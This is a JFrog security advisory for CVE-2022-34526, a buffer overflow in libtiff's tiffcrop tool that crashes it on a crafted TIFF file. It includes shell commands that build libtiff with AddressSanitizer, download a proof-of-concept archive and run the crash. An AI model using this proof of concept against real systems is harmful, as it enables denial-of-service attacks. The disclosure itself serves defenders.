JFrog Security Research

XRAY-259933 - libtiff tiffcrop buffer overflow DoS

CVE-2022-34526 | CVSS 6.5

JFrog Severity:medium

Published 16 Nov. 2022 | Last updated 16 Nov. 2022

A global-memory buffer overflow in the libtiff library leads to denial of service when processing crafted TIFF images with tiffcrop.


libtiff (,), no fixed release

A 4-byte global-memory buffer overflow occurs when tiffcrop is run with the -i argument against a crafted TIFF file, leading to a crash of tiffcrop.

Compile libtiff 4.4.0 with ASAN

curl https://gitlab.com/libtiff/libtiff/-/archive/v4.4.0/libtiff-v4.4.0.tar.gz -o libtiff-v4.4.0.tar.gz
tar -xf libtiff-v4.4.0.tar.gz
cd libtiff-v4.4.0
CC=gcc CXX=g++ CFLAGS="-ggdb -fsanitize=address" ./configure && make

Run the PoC

cd tools
curl https://gitlab.com/libtiff/libtiff/uploads/9943030806e03e7d2b8dff5ec0341b6f/poc.zip -o poc.zip
unzip poc.zip
./tiffcrop -i poc.tif a.tif

No vulnerability mitigations are supplied for this issue

Advisory & PoC exploit